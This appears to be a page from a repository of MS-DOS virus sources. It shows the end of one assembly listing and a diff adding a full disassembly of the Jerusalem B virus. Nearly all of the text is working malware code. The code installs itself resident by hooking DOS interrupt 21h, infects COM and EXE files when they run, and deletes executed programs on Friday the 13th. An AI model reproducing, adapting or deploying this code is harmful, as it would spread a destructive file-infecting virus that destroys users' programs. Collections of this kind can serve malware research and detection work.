dw 04EBh ;97B3 EB 04
dw 0006h ;97B5 06 00
dw 156Ch ;97B7 6C 15
dw 2508h ;97B9 08 25
dw 0FEA5h ;97BB A5 FE
dw 07BCh ;97BD BC 07
dw 0216h ;97BF 16 02
dw 065Eh ;97C1 5E 06
dw 156Ch ;97C3 6C 15
dw 0C89h ;97C5 89 0C
dw 012Fh ;97C7 2F 01
dw 7F04h ;97C9 04 7F
dw 0075h ;97CB 75 00
dw 065Eh ;97CD 5E 06
dw 5A1Dh ;97CF 1D 5A
dw 0 ;97D1 00 00
dw 9301h ;97D3 01 93
dw 0BA6h ;97D5 A6 0B
dw 0213h ;97D7 13 02
dw 0C89h ;97D9 89 0C
dw 0F202h ;97DB 02 F2
L065D dw 2700h ;szczyt stosu ;97DD 00 27
L065F DB 0C8H,0F7h,0E1h,0EEh,0E7h ;97DF C8 F7 E1 EE E7
L0664 label byte
S9180 ENDS
END L9244
MSDOS/J-Index/Virus.MSDOS.Unknown.jacky.asm
+1148
View File
File diff suppressed because it is too large Load Diff
MSDOS/J-Index/Virus.MSDOS.Unknown.jeru-b.asm
+794
View File
@@ -0,0 +1,794 @@
This is the Jerusalem B Virus.
"JV.MOC" PAGE 0001
0000:0000 E99200 JMP X0095
0000:0003 7355 JAE X005A
0000:0005 4D DEC BP
0000:0006 7344 JAE X004C
0000:0008 6F73 JG X007D
0000:000A 0001 ADD [BX+DI],AL
0000:000C BD1700 MOV BP,0017H
0000:000F 0000 ADD [BX+SI],AL
0000:0011 06 PUSH ES
0000:0012 00A5FE00 ADD [DI+Y00FEH],AH
0000:0016 F016 LOCK PUSH SS
0000:0018 17 POP SS
0000:0019 7702 JA X001D
0000:001B BF053D MOV DI,03D05H
0000:001E 0CFB OR AL,0FBH
0000:0020 7D00 JGE X0022
0000:0022 0000 X0022: ADD [BX+SI],AL
0000:0024 0000 ADD [BX+SI],AL
0000:0026 0000 ADD [BX+SI],AL
0000:0028 0000 ADD [BX+SI],AL
0000:002A 0000 ADD [BX+SI],AL
0000:002C 0000 ADD [BX+SI],AL
0000:002E E8062A CALL X2A37
0000:0031 B10D MOV CL,0DH
0000:0033 800000 ADD BYTE PTR [BX+SI],00H
0000:0036 008000B1 ADD [BX+SI+Y0B100H],AL
0000:003A 0D5C00 OR AX,005CH
0000:003D B10D MOV CL,0DH
0000:003F 6C00 JL X0041
0000:0041 B10D X0041: MOV CL,0DH
0000:0043 0004 ADD [SI],AL
0000:0045 5F POP DI
0000:0046 0F POP CS
0000:0047 B400 MOV AH,00H
0000:0049 C1 RET ; INTRASEGMENT
0000:004A 0D00F0 X004A: OR AX,0F000H
0000:004D 06 PUSH ES
0000:004E 004D5A ADD [DI+05AH],CL
0000:0051 2000 AND [BX+SI],AL
0000:0053 1000 ADC [BX+SI],AL
0000:0055 1900 SBB [BX+SI],AX
0000:0057 0800 OR [BX+SI],AL
0000:0059 7500 JNZ X005B
0000:005B 7500 X005B: JNZ X005D
0000:005D 6901 X005D: JNS X0060
0000:005F 1007 ADC [BX],AL
0000:0061 8419 TEST BL,[BX+DI]
0000:0063 C500 LDS AX,[BX+SI]
0000:0065 6901 JNS X0068
0000:0067 1C00 SBB AL,00H
0000:0069 0000 ADD [BX+SI],AL
0000:006B 4C X006B: DEC SP
0000:006C B000 MOV AL,00H
0000:006E CD21 INT 021H
0000:0070 050020 ADD AX,02000H
0000:0073 0037 ADD [BX],DH
"JV.MOC" PAGE 0002
0000:0075 121C ADC BL,[SI]
0000:0077 0100 ADD [BX+SI],AX
0000:0079 0210 ADD DL,[BX+SI]
0000:007B 0010 ADD [BX+SI],DL
0000:007D 17 X007D: POP SS
0000:007E 0000 ADD [BX+SI],AL
0000:0080 53 PUSH BX
0000:0081 61E8 JNO X006B
0000:0083 38434F CMP [BP+DI+04FH],AL
0000:0086 4D DEC BP
0000:0087 4D DEC BP
0000:0088 41 INC CX
0000:0089 4E DEC SI
0000:008A 44 INC SP
0000:008B 2E43 INC BX
0000:008D 4F DEC DI
0000:008E 4D DEC BP
0000:008F 0100 ADD [BX+SI],AX
0000:0091 0000 ADD [BX+SI],AL
0000:0093 0000 ADD [BX+SI],AL
0000:0095 FC X0095: CLD
0000:0096 B4E0 MOV AH,0E0H
0000:0098 CD21 INT 021H
0000:009A 80FCE0 CMP AH,0E0H
0000:009D 7316 JAE X00B5
0000:009F 80FC03 CMP AH,03H
0000:00A2 7211 JB X00B5
0000:00A4 B4DD MOV AH,0DDH
0000:00A6 BF0001 MOV DI,0100H
0000:00A9 BE1007 MOV SI,0710H
0000:00AC 03F7 ADD SI,DI
0000:00AE 2E8B8D1100 MOV CX,CS:[DI+Y0011H]
0000:00B3 CD21 INT 021H
0000:00B5 8CC8 X00B5: MOV AX,CS
0000:00B7 051000 ADD AX,0010H
0000:00BA 8ED0 MOV SS,AX
0000:00BC BC0007 MOV SP,0700H
0000:00BF 50 PUSH AX
0000:00C0 B8C500 MOV AX,00C5H
0000:00C3 50 PUSH AX
0000:00C4 CB RET ; INTERSEGMENT
0000:00C5 FC X00C5: CLD
0000:00C6 06 PUSH ES
0000:00C7 2E8C063100 MOV CS:[Y0031H],ES
0000:00CC 2E8C063900 MOV CS:[Y0039H],ES
0000:00D1 2E8C063D00 MOV CS:[Y003DH],ES
0000:00D6 2E8C064100 MOV CS:[Y0041H],ES
0000:00DB 8CC0 MOV AX,ES
0000:00DD 051000 ADD AX,0010H
0000:00E0 2E01064900 ADD CS:[Y0049H],AX
0000:00E5 2E01064500 ADD CS:[Y0045H],AX
0000:00EA B4E0 MOV AH,0E0H
0000:00EC CD21 INT 021H
0000:00EE 80FCE0 CMP AH,0E0H
0000:00F1 7313 JAE X0106
0000:00F3 80FC03 CMP AH,03H
"JV.MOC" PAGE 0003
0000:00F6 07 POP ES
0000:00F7 2E8E164500 MOV SS,CS:[Y0045H]
0000:00FC 2E8B264300 MOV SP,CS:[Y0043H]
0000:0101 2EFF2E4700 JMP CS:[Y0047H]
0000:0106 33C0 X0106: XOR AX,AX
0000:0108 8EC0 MOV ES,AX
0000:010A 26A1FC03 MOV AX,ES:Y03FCH
0000:010E 2EA34B00 MOV CS:Y004BH,AX
0000:0112 26A0FE03 MOV AL,ES:Y03FEH
0000:0116 2EA24D00 MOV CS:Y004DH,AL
0000:011A 26C706FC03F3A5 MOV WORD PTR ES:[Y03FCH],0A5F3H
0000:0121 26C606FE03CB MOV BYTE PTR ES:[Y03FEH],0CBH
0000:0127 58 POP AX
0000:0128 051000 ADD AX,0010H
0000:012B 8EC0 MOV ES,AX
0000:012D 0E PUSH CS
0000:012E 1F POP DS
0000:012F B91007 MOV CX,0710H
0000:0132 D1E9 SHR CX,1
0000:0134 33F6 XOR SI,SI
0000:0136 8BFE MOV DI,SI
0000:0138 06 PUSH ES
0000:0139 B84201 MOV AX,0142H
0000:013C 50 PUSH AX
0000:013D EAFC030000 JMP X0000_03FC
0000:0142 8CC8 MOV AX,CS
0000:0144 8ED0 MOV SS,AX
0000:0146 BC0007 MOV SP,0700H
0000:0149 33C0 XOR AX,AX
0000:014B 8ED8 MOV DS,AX
0000:014D 2EA14B00 MOV AX,CS:Y004BH
0000:0151 A3FC03 MOV Y03FCH,AX
0000:0154 2EA04D00 MOV AL,CS:Y004DH
0000:0158 A2FE03 MOV Y03FEH,AL
0000:015B 8BDC MOV BX,SP
0000:015D B104 MOV CL,04H
0000:015F D3EB SHR BX,CL
0000:0161 83C310 ADD BX,0010H
0000:0164 2E891E3300 MOV CS:[Y0033H],BX
0000:0169 B44A MOV AH,04AH
0000:016B 2E8E063100 MOV ES,CS:[Y0031H]
0000:0170 CD21 INT 021H
0000:0172 B82135 MOV AX,03521H
0000:0175 CD21 INT 021H
0000:0177 2E891E1700 MOV CS:[Y0017H],BX
0000:017C 2E8C061900 MOV CS:[Y0019H],ES
0000:0181 0E PUSH CS
0000:0182 1F POP DS
0000:0183 BA5B02 MOV DX,025BH
0000:0186 B82125 MOV AX,02521H
0000:0189 CD21 INT 021H
0000:018B 8E063100 MOV ES,[Y0031H]
0000:018F 268E062C00 MOV ES,ES:[Y002CH]
0000:0194 33FF XOR DI,DI
0000:0196 B9FF7F MOV CX,07FFFH
0000:0199 32C0 XOR AL,AL
"JV.MOC" PAGE 0004
0000:019B F2AE X019B: REPNE SCASB
0000:019D 263805 CMP ES:[DI],AL
0000:01A0 E0F9 LOOPNZ X019B
0000:01A2 8BD7 MOV DX,DI
0000:01A4 83C203 ADD DX,0003H
0000:01A7 B8004B MOV AX,04B00H
0000:01AA 06 PUSH ES
0000:01AB 1F POP DS
0000:01AC 0E PUSH CS
0000:01AD 07 POP ES
0000:01AE BB3500 MOV BX,0035H
0000:01B1 1E PUSH DS
0000:01B2 06 PUSH ES
0000:01B3 50 PUSH AX
0000:01B4 53 PUSH BX
0000:01B5 51 PUSH CX
0000:01B6 52 PUSH DX
0000:01B7 B42A MOV AH,02AH
0000:01B9 CD21 INT 021H
0000:01BB 2EC6060E0000 MOV BYTE PTR CS:[Y000EH],00H
0000:01C1 81F9C307 CMP CX,07C3H
0000:01C5 7430 JZ X01F7
0000:01C7 3C05 CMP AL,05H
0000:01C9 750D JNZ X01D8
0000:01CB 80FA0D CMP DL,0DH
0000:01CE 7508 JNZ X01D8
0000:01D0 2EFE060E00 INC BYTE PTR CS:[Y000EH]
0000:01D5 EB20 JMP X01F7
0000:01D7 90 NOP
0000:01D8 B80835 X01D8: MOV AX,03508H
0000:01DB CD21 INT 021H
0000:01DD 2E891E1300 MOV CS:[Y0013H],BX
0000:01E2 2E8C061500 MOV CS:[Y0015H],ES
0000:01E7 0E PUSH CS
0000:01E8 1F POP DS
0000:01E9 C7061F00907E MOV WORD PTR [Y001FH],07E90H
0000:01EF B80825 MOV AX,02508H
0000:01F2 BA1E02 MOV DX,021EH
0000:01F5 CD21 INT 021H
0000:01F7 5A X01F7: POP DX
0000:01F8 59 POP CX
0000:01F9 5B POP BX
0000:01FA 58 POP AX
0000:01FB 07 POP ES
0000:01FC 1F POP DS
0000:01FD 9C PUSHF
0000:01FE 2EFF1E1700 CALL CS:[Y0017H]
0000:0203 1E PUSH DS
0000:0204 07 POP ES
0000:0205 B449 MOV AH,049H
0000:0207 CD21 INT 021H
0000:0209 B44D MOV AH,04DH
0000:020B CD21 INT 021H
0000:020D B431 MOV AH,031H
0000:020F BA0006 MOV DX,0600H
0000:0212 B104 MOV CL,04H
"JV.MOC" PAGE 0005
0000:0214 D3EA SHR DX,CL
0000:0216 83C210 ADD DX,0010H
0000:0219 CD21 INT 021H
0000:021B 32C0 XOR AL,AL
0000:021D CF IRET
0000:021E 2E833E1F0002 CMP WORD PTR CS:[Y001FH],0002H
0000:0224 7517 JNZ X023D
0000:0226 50 PUSH AX
0000:0227 53 PUSH BX
0000:0228 51 PUSH CX
0000:0229 52 PUSH DX
0000:022A 55 PUSH BP
0000:022B B80206 MOV AX,0602H
0000:022E B787 MOV BH,087H
0000:0230 B90505 MOV CX,0505H
0000:0233 BA1010 MOV DX,01010H
0000:0236 CD10 INT 010H
0000:0238 5D POP BP
0000:0239 5A POP DX
0000:023A 59 POP CX
0000:023B 5B POP BX
0000:023C 58 POP AX
0000:023D 2EFF0E1F00 X023D: DEC WORD PTR CS:[Y001FH]
0000:0242 7512 JNZ X0256
0000:0244 2EC7061F000100 MOV WORD PTR CS:[Y001FH],0001H
0000:024B 50 PUSH AX
0000:024C 51 PUSH CX
0000:024D 56 PUSH SI
0000:024E B90140 MOV CX,04001H
0000:0251 F3AC REPE LODSB
0000:0253 5E POP SI
0000:0254 59 POP CX
0000:0255 58 POP AX
0000:0256 2EFF2E1300 X0256: JMP CS:[Y0013H]
0000:025B 9C X025B: PUSHF
0000:025C 80FCE0 CMP AH,0E0H
0000:025F 7505 JNZ X0266
0000:0261 B80003 MOV AX,0300H
0000:0264 9D POPF
0000:0265 CF IRET
0000:0266 80FCDD X0266: CMP AH,0DDH
0000:0269 7413 JZ X027E
0000:026B 80FCDE CMP AH,0DEH
0000:026E 7428 JZ X0298
0000:0270 3D004B CMP AX,04B00H
0000:0273 7503 JNZ X0278
0000:0275 E9B400 JMP X032C
0000:0278 9D X0278: POPF
0000:0279 2EFF2E1700 JMP CS:[Y0017H]
0000:027E 58 X027E: POP AX
0000:027F 58 POP AX
0000:0280 B80001 MOV AX,0100H
0000:0283 2EA30A00 MOV CS:Y000AH,AX
0000:0287 58 POP AX
0000:0288 2EA30C00 MOV CS:Y000CH,AX
0000:028C F3A4 REPE MOVSB
"JV.MOC" PAGE 0006
0000:028E 9D POPF
0000:028F 2EA10F00 MOV AX,CS:Y000FH
0000:0293 2EFF2E0A00 JMP CS:[Y000AH]
0000:0298 83C406 X0298: ADD SP,0006H
0000:029B 9D POPF
0000:029C 8CC8 MOV AX,CS
0000:029E 8ED0 MOV SS,AX
0000:02A0 BC1007 MOV SP,0710H
0000:02A3 06 PUSH ES
0000:02A4 06 PUSH ES
0000:02A5 33FF XOR DI,DI
0000:02A7 0E PUSH CS
0000:02A8 07 POP ES
0000:02A9 B91000 MOV CX,0010H
0000:02AC 8BF3 MOV SI,BX
0000:02AE BF2100 MOV DI,0021H
0000:02B1 F3A4 REPE MOVSB
0000:02B3 8CD8 MOV AX,DS
0000:02B5 8EC0 MOV ES,AX
0000:02B7 2EF7267A00 MUL WORD PTR CS:[Y007AH]
0000:02BC 2E03062B00 ADD AX,CS:[Y002BH]
0000:02C1 83D200 ADC DX,0000H
0000:02C4 2EF7367A00 DIV WORD PTR CS:[Y007AH]
0000:02C9 8ED8 MOV DS,AX
0000:02CB 8BF2 MOV SI,DX
0000:02CD 8BFA MOV DI,DX
0000:02CF 8CC5 MOV BP,ES
0000:02D1 2E8B1E2F00 MOV BX,CS:[Y002FH]
0000:02D6 0BDB OR BX,BX
0000:02D8 7413 JZ X02ED
0000:02DA B90080 X02DA: MOV CX,08000H
0000:02DD F3A5 REPE MOVSW
0000:02DF 050010 ADD AX,01000H
0000:02E2 81C50010 ADD BP,01000H
0000:02E6 8ED8 MOV DS,AX
0000:02E8 8EC5 MOV ES,BP
0000:02EA 4B DEC BX
0000:02EB 75ED JNZ X02DA
0000:02ED 2E8B0E2D00 X02ED: MOV CX,CS:[Y002DH]
0000:02F2 F3A4 REPE MOVSB
0000:02F4 58 POP AX
0000:02F5 50 PUSH AX
0000:02F6 051000 ADD AX,0010H
0000:02F9 2E01062900 ADD CS:[Y0029H],AX
0000:02FE 2E01062500 ADD CS:[Y0025H],AX
0000:0303 2EA12100 MOV AX,CS:Y0021H
0000:0307 1F POP DS
0000:0308 07 POP ES
0000:0309 2E8E162900 MOV SS,CS:[Y0029H]
0000:030E 2E8B262700 MOV SP,CS:[Y0027H]
0000:0313 2EFF2E2300 JMP CS:[Y0023H]
0000:0318 33C9 X0318: XOR CX,CX
0000:031A B80143 MOV AX,04301H
0000:031D CD21 INT 021H
0000:031F B441 MOV AH,041H
0000:0321 CD21 INT 021H
"JV.MOC" PAGE 0007
0000:0323 B8004B MOV AX,04B00H
0000:0326 9D POPF
0000:0327 2EFF2E1700 JMP CS:[Y0017H]
0000:032C 2E803E0E0001 X032C: CMP BYTE PTR CS:[Y000EH],01H
0000:0332 74E4 JZ X0318
0000:0334 2EC7067000FFFF MOV WORD PTR CS:[Y0070H],0FFFFH
0000:033B 2EC7068F000000 MOV WORD PTR CS:[Y008FH],0000H
0000:0342 2E89168000 MOV CS:[Y0080H],DX
0000:0347 2E8C1E8200 MOV CS:[Y0082H],DS
0000:034C 50 PUSH AX
0000:034D 53 PUSH BX
0000:034E 51 PUSH CX
0000:034F 52 PUSH DX
0000:0350 56 PUSH SI
0000:0351 57 PUSH DI
0000:0352 1E PUSH DS
0000:0353 06 PUSH ES
0000:0354 FC CLD
0000:0355 8BFA MOV DI,DX
0000:0357 32D2 XOR DL,DL
0000:0359 807D013A CMP BYTE PTR [DI+01H],03AH
0000:035D 7505 JNZ X0364
0000:035F 8A15 MOV DL,[DI]
0000:0361 80E21F AND DL,01FH
0000:0364 B436 X0364: MOV AH,036H
0000:0366 CD21 INT 021H
0000:0368 3DFFFF CMP AX,0FFFFH
0000:036B 7503 JNZ X0370
0000:036D E97702 X036D: JMP X05E7
0000:0370 F7E3 X0370: MUL BX
0000:0372 F7E1 MUL CX
0000:0374 0BD2 OR DX,DX
0000:0376 7505 JNZ X037D
0000:0378 3D1007 CMP AX,0710H
0000:037B 72F0 JB X036D
0000:037D 2E8B168000 X037D: MOV DX,CS:[Y0080H]
0000:0382 1E PUSH DS
0000:0383 07 POP ES
0000:0384 32C0 XOR AL,AL
0000:0386 B94100 MOV CX,0041H
0000:0389 F2AE REPNE SCASB
0000:038B 2E8B368000 MOV SI,CS:[Y0080H]
0000:0390 8A04 X0390: MOV AL,[SI]
0000:0392 0AC0 OR AL,AL
0000:0394 740E JZ X03A4
0000:0396 3C61 CMP AL,061H
0000:0398 7207 JB X03A1
0000:039A 3C7A CMP AL,07AH
0000:039C 7703 JA X03A1
0000:039E 802C20 SUB BYTE PTR [SI],020H
0000:03A1 46 X03A1: INC SI
0000:03A2 EBEC JMP X0390
0000:03A4 B90B00 X03A4: MOV CX,000BH
0000:03A7 2BF1 SUB SI,CX
0000:03A9 BF8400 MOV DI,0084H
0000:03AC 0E PUSH CS
"JV.MOC" PAGE 0008
0000:03AD 07 POP ES
0000:03AE B90B00 MOV CX,000BH
0000:03B1 F3A6 REPE CMPSB
0000:03B3 7503 JNZ X03B8
0000:03B5 E92F02 JMP X05E7
0000:03B8 B80043 X03B8: MOV AX,04300H
0000:03BB CD21 INT 021H
0000:03BD 7205 JB X03C4
0000:03BF 2E890E7200 MOV CS:[Y0072H],CX
0000:03C4 7225 X03C4: JB X03EB
0000:03C6 32C0 XOR AL,AL
0000:03C8 2EA24E00 MOV CS:Y004EH,AL
0000:03CC 1E PUSH DS
0000:03CD 07 POP ES
0000:03CE 8BFA MOV DI,DX
0000:03D0 B94100 MOV CX,0041H
0000:03D3 F2AE REPNE SCASB
0000:03D5 807DFE4D CMP BYTE PTR [DI-02H],04DH
0000:03D9 740B JZ X03E6
0000:03DB 807DFE6D CMP BYTE PTR [DI-02H],06DH
0000:03DF 7405 JZ X03E6
0000:03E1 2EFE064E00 INC BYTE PTR CS:[Y004EH]
0000:03E6 B8003D X03E6: MOV AX,03D00H
0000:03E9 CD21 INT 021H
0000:03EB 725A X03EB: JB X0447
0000:03ED 2EA37000 MOV CS:Y0070H,AX
0000:03F1 8BD8 MOV BX,AX
0000:03F3 B80242 MOV AX,04202H
0000:03F6 B9FFFF MOV CX,0FFFFH
0000:03F9 BAFBFF MOV DX,0FFFBH
0000:03FC CD21 X03FC: INT 021H
0000:03FE 72EB JB X03EB
0000:0400 050500 ADD AX,0005H
0000:0403 2EA31100 MOV CS:Y0011H,AX
0000:0407 B90500 MOV CX,0005H
0000:040A BA6B00 MOV DX,006BH
0000:040D 8CC8 MOV AX,CS
0000:040F 8ED8 MOV DS,AX
0000:0411 8EC0 MOV ES,AX
0000:0413 B43F MOV AH,03FH
0000:0415 CD21 INT 021H
0000:0417 8BFA MOV DI,DX
0000:0419 BE0500 MOV SI,0005H
0000:041C F3A6 REPE CMPSB
0000:041E 7507 JNZ X0427
0000:0420 B43E MOV AH,03EH
0000:0422 CD21 INT 021H
0000:0424 E9C001 JMP X05E7
0000:0427 B82435 X0427: MOV AX,03524H
0000:042A CD21 INT 021H
0000:042C 891E1B00 MOV [Y001BH],BX
0000:0430 8C061D00 MOV [Y001DH],ES
0000:0434 BA1B02 MOV DX,021BH
0000:0437 B82425 MOV AX,02524H
0000:043A CD21 INT 021H
0000:043C C5168000 LDS DX,[Y0080H]
"JV.MOC" PAGE 0009
0000:0440 33C9 XOR CX,CX
0000:0442 B80143 MOV AX,04301H
0000:0445 CD21 INT 021H
0000:0447 723B X0447: JB X0484
0000:0449 2E8B1E7000 MOV BX,CS:[Y0070H]
0000:044E B43E MOV AH,03EH
0000:0450 CD21 INT 021H
0000:0452 2EC7067000FFFF MOV WORD PTR CS:[Y0070H],0FFFFH
0000:0459 B8023D MOV AX,03D02H
0000:045C CD21 INT 021H
0000:045E 7224 JB X0484
0000:0460 2EA37000 MOV CS:Y0070H,AX
0000:0464 8CC8 MOV AX,CS
0000:0466 8ED8 MOV DS,AX
0000:0468 8EC0 MOV ES,AX
0000:046A 8B1E7000 MOV BX,[Y0070H]
0000:046E B80057 MOV AX,05700H
0000:0471 CD21 INT 021H
0000:0473 89167400 MOV [Y0074H],DX
0000:0477 890E7600 MOV [Y0076H],CX
0000:047B B80042 MOV AX,04200H
0000:047E 33C9 XOR CX,CX
0000:0480 8BD1 MOV DX,CX
0000:0482 CD21 INT 021H
0000:0484 723D X0484: JB X04C3
0000:0486 803E4E0000 CMP BYTE PTR [Y004EH],00H
0000:048B 7403 JZ X0490
0000:048D EB57 JMP X04E6
0000:048F 90 NOP
0000:0490 BB0010 X0490: MOV BX,01000H
0000:0493 B448 MOV AH,048H
0000:0495 CD21 INT 021H
0000:0497 730B JAE X04A4
0000:0499 B43E MOV AH,03EH
0000:049B 8B1E7000 MOV BX,[Y0070H]
0000:049F CD21 INT 021H
0000:04A1 E94301 JMP X05E7
0000:04A4 FF068F00 X04A4: INC WORD PTR [Y008FH]
0000:04A8 8EC0 MOV ES,AX
0000:04AA 33F6 XOR SI,SI
0000:04AC 8BFE MOV DI,SI
0000:04AE B91007 MOV CX,0710H
0000:04B1 F3A4 REPE MOVSB
0000:04B3 8BD7 MOV DX,DI
0000:04B5 8B0E1100 MOV CX,[Y0011H]
0000:04B9 8B1E7000 MOV BX,[Y0070H]
0000:04BD 06 PUSH ES
0000:04BE 1F POP DS
0000:04BF B43F MOV AH,03FH
0000:04C1 CD21 INT 021H
0000:04C3 721C X04C3: JB X04E1
0000:04C5 03F9 ADD DI,CX
0000:04C7 33C9 XOR CX,CX
0000:04C9 8BD1 MOV DX,CX
0000:04CB B80042 MOV AX,04200H
0000:04CE CD21 INT 021H
"JV.MOC" PAGE 0010
0000:04D0 BE0500 MOV SI,0005H
0000:04D3 B90500 MOV CX,0005H
0000:04D6 F32EA4 REPE MOVS ES:BYTE PTR (DI),CS:BYTE PT
R (SI)
0000:04D9 8BCF MOV CX,DI
0000:04DB 33D2 XOR DX,DX
0000:04DD B440 MOV AH,040H
0000:04DF CD21 INT 021H
0000:04E1 720D X04E1: JB X04F0
0000:04E3 E9BC00 JMP X05A2
0000:04E6 B91C00 X04E6: MOV CX,001CH
0000:04E9 BA4F00 MOV DX,004FH
0000:04EC B43F MOV AH,03FH
0000:04EE CD21 INT 021H
0000:04F0 724A X04F0: JB X053C
0000:04F2 C70661008419 MOV WORD PTR [Y0061H],01984H
0000:04F8 A15D00 MOV AX,Y005DH
0000:04FB A34500 MOV Y0045H,AX
0000:04FE A15F00 MOV AX,Y005FH
0000:0501 A34300 MOV Y0043H,AX
0000:0504 A16300 MOV AX,Y0063H
0000:0507 A34700 MOV Y0047H,AX
0000:050A A16500 MOV AX,Y0065H
0000:050D A34900 MOV Y0049H,AX
0000:0510 A15300 MOV AX,Y0053H
0000:0513 833E510000 CMP WORD PTR [Y0051H],0000H
0000:0518 7401 JZ X051B
0000:051A 48 DEC AX
0000:051B F7267800 X051B: MUL WORD PTR [Y0078H]
0000:051F 03065100 ADD AX,[Y0051H]
0000:0523 83D200 ADC DX,0000H
0000:0526 050F00 ADD AX,000FH
0000:0529 83D200 ADC DX,0000H
0000:052C 25F0FF AND AX,0FFF0H
0000:052F A37C00 MOV Y007CH,AX
0000:0532 89167E00 MOV [Y007EH],DX
0000:0536 051007 ADD AX,0710H
0000:0539 83D200 ADC DX,0000H
0000:053C 723A X053C: JB X0578
0000:053E F7367800 DIV WORD PTR [Y0078H]
0000:0542 0BD2 OR DX,DX
0000:0544 7401 JZ X0547
0000:0546 40 INC AX
0000:0547 A35300 X0547: MOV Y0053H,AX
0000:054A 89165100 MOV [Y0051H],DX
0000:054E A17C00 MOV AX,Y007CH
0000:0551 8B167E00 MOV DX,[Y007EH]
0000:0555 F7367A00 DIV WORD PTR [Y007AH]
0000:0559 2B065700 SUB AX,[Y0057H]
0000:055D A36500 MOV Y0065H,AX
0000:0560 C7066300C500 MOV WORD PTR [Y0063H],00C5H
0000:0566 A35D00 MOV Y005DH,AX
0000:0569 C7065F001007 MOV WORD PTR [Y005FH],0710H
0000:056F 33C9 XOR CX,CX
0000:0571 8BD1 MOV DX,CX
0000:0573 B80042 MOV AX,04200H
0000:0576 CD21 INT 021H
"JV.MOC" PAGE 0011
0000:0578 720A X0578: JB X0584
0000:057A B91C00 MOV CX,001CH
0000:057D BA4F00 MOV DX,004FH
0000:0580 B440 MOV AH,040H
0000:0582 CD21 INT 021H
0000:0584 7211 X0584: JB X0597
0000:0586 3BC1 CMP AX,CX
0000:0588 7518 JNZ X05A2
0000:058A 8B167C00 MOV DX,[Y007CH]
0000:058E 8B0E7E00 MOV CX,[Y007EH]
0000:0592 B80042 MOV AX,04200H
0000:0595 CD21 INT 021H
0000:0597 7209 X0597: JB X05A2
0000:0599 33D2 XOR DX,DX
0000:059B B91007 MOV CX,0710H
0000:059E B440 MOV AH,040H
0000:05A0 CD21 INT 021H
0000:05A2 2E833E8F0000 X05A2: CMP WORD PTR CS:[Y008FH],0000H
0000:05A8 7404 JZ X05AE
0000:05AA B449 MOV AH,049H
0000:05AC CD21 INT 021H
0000:05AE 2E833E7000FF X05AE: CMP WORD PTR CS:[Y0070H],0FFFFH
0000:05B4 7431 JZ X05E7
0000:05B6 2E8B1E7000 MOV BX,CS:[Y0070H]
0000:05BB 2E8B167400 MOV DX,CS:[Y0074H]
0000:05C0 2E8B0E7600 MOV CX,CS:[Y0076H]
0000:05C5 B80157 MOV AX,05701H
0000:05C8 CD21 INT 021H
0000:05CA B43E MOV AH,03EH
0000:05CC CD21 INT 021H
0000:05CE 2EC5168000 LDS DX,CS:[Y0080H]
0000:05D3 2E8B0E7200 MOV CX,CS:[Y0072H]
0000:05D8 B80143 MOV AX,04301H
0000:05DB CD21 INT 021H
0000:05DD 2EC5161B00 LDS DX,CS:[Y001BH]
0000:05E2 B82425 MOV AX,02524H
0000:05E5 CD21 INT 021H
0000:05E7 07 X05E7: POP ES
0000:05E8 1F POP DS
0000:05E9 5F POP DI
0000:05EA 5E POP SI
0000:05EB 5A POP DX
0000:05EC 59 POP CX
0000:05ED 5B POP BX
0000:05EE 58 POP AX
0000:05EF 9D POPF
0000:05F0 2EFF2E1700 JMP CS:[Y0017H]
0000:05F5 0000 X05F5: ADD [BX+SI],AL
0000:05F7 0000 ADD [BX+SI],AL
0000:05F9 0000 ADD [BX+SI],AL
0000:05FB 0000 ADD [BX+SI],AL
0000:05FD 0000 ADD [BX+SI],AL
0000:05FF 004D00 ADD [DI+00H],CL
0000:0602 000F ADD [BX],CL
0000:0604 0000 ADD [BX+SI],AL
0000:0606 0000 ADD [BX+SI],AL
"JV.MOC" PAGE 0012
0000:0608 0000 ADD [BX+SI],AL
0000:060A 0000 ADD [BX+SI],AL
0000:060C 0000 ADD [BX+SI],AL
0000:060E 0000 ADD [BX+SI],AL
0000:0610 CD20 INT 020H
0000:0612 00A0009A ADD [BX+SI+Y09A00H],AH
0000:0616 F0FE1D LOCK CALL [DI] ; NOT VALID
0000:0619 F02F LOCK DAS
0000:061B 018E1E3C ADD [BP+Y03C1EH],CX
0000:061F 018E1EEB ADD [BP+Y0EB1EH],CX
0000:0623 048E ADD AL,08EH
0000:0625 1E PUSH DS
0000:0626 8E1EFFFF MOV DS,[Y0FFFFH]
0000:062A FFFF ??? DI
0000:062C FFFF ??? DI
0000:062E FFFF ??? DI
0000:0630 FFFF ??? DI
0000:0632 FFFF ??? DI
0000:0634 FFFF ??? DI
0000:0636 FFFF ??? DI
0000:0638 FFFF ??? DI
0000:063A FFFF ??? DI
0000:063C 7C1F JL X065D
0000:063E DE3E8D29 ESC 037H,[Y0298DH]
0000:0642 1400 ADC AL,00H
0000:0644 1800 SBB [BX+SI],AL
0000:0646 F1 DB 0F1H
0000:0647 1F POP DS
0000:0648 FFFF ??? DI
0000:064A FFFF ??? DI
0000:064C 0000 ADD [BX+SI],AL
0000:064E 0000 ADD [BX+SI],AL
0000:0650 0000 ADD [BX+SI],AL
0000:0652 0000 ADD [BX+SI],AL
0000:0654 0000 ADD [BX+SI],AL
0000:0656 0000 ADD [BX+SI],AL
0000:0658 0000 ADD [BX+SI],AL
0000:065A 0000 ADD [BX+SI],AL
0000:065C 0000 ADD [BX+SI],AL
0000:065E 0000 ADD [BX+SI],AL
0000:0660 CD21 INT 021H
0000:0662 CB RET ; INTERSEGMENT
0000:0663 0000 X0663: ADD [BX+SI],AL
0000:0665 0000 ADD [BX+SI],AL
0000:0667 0000 ADD [BX+SI],AL
0000:0669 0000 ADD [BX+SI],AL
0000:066B 0000 ADD [BX+SI],AL
0000:066D 2020 AND [BX+SI],AH
0000:066F 2020 AND [BX+SI],AH
0000:0671 2020 AND [BX+SI],AH
0000:0673 2020 AND [BX+SI],AH
0000:0675 2020 AND [BX+SI],AH
0000:0677 2000 AND [BX+SI],AL
0000:0679 0000 ADD [BX+SI],AL
0000:067B 0000 ADD [BX+SI],AL
0000:067D 2020 AND [BX+SI],AH
"JV.MOC" PAGE 0013
0000:067F 2020 AND [BX+SI],AH
0000:0681 2020 AND [BX+SI],AH
0000:0683 2020 AND [BX+SI],AH
0000:0685 2020 AND [BX+SI],AH
0000:0687 2000 AND [BX+SI],AL
0000:0689 0000 ADD [BX+SI],AL
0000:068B 0000 ADD [BX+SI],AL
0000:068D 0000 ADD [BX+SI],AL
0000:068F 0000 ADD [BX+SI],AL
0000:0691 0D6B6F OR AX,06F6BH
